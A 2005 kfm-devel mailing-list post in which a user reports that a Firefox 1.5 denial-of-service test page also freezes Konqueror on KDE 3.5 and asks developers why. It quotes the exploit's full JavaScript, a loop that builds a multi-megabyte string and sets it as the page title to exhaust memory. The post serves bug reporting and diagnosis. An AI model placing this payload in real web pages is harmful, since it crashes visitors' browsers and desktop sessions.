Firefox DoS attack affects konqueror/KDE too
Pavel Troller
patrol at sinus.cz
Mon Dec 12 10:36:43 GMT 2005
Hi!
Recently I've read about the FireFox 1.5 DoS attack
( http://www.eweek.com/article2/0,1895,1898253,00.asp ) and tried the testing
URL ( http://atom.mamto.cz/projekty/bugs/firefox/test.html ) with konqueror
from a recet KDE3.5 branch.
Immediately after clicking on the link, my system became to be unresponsive,
the HDD LED was on permanently and after a while, it ended up with kernel OOM
killer killing not only the konqueror, but alson klauncher, konsole, kwin and
others, so all my KDE session was wrecked and I had to relogin. All this on a
machine with 512 M of RAM and the same amount of swap.
In the exploit, there is the following malicious js code:
<script type="text/javascript">
function ex() {
var buffer = "";
for (var i = 0; i < 5000; i++) {
buffer += "A";
}
var buffer2 = buffer;
for (i = 0; i < 500; i++) {
buffer2 += buffer;
}
document.title = buffer2;
}
</script>
To my eyes, it looks as generating 2.5M long string and then setting it as
a document.title. Why such a manipulation exhausted all the system's memory ?
Isn't there a bug somewhere ? And how to protect the system against this ?
On the other side, it should be said that konqueror is not vulnerable the
same way as firefox; there is no need to erase any files before using it again.
With regards, Pavel Troller
More information about the kfm-devel
mailing list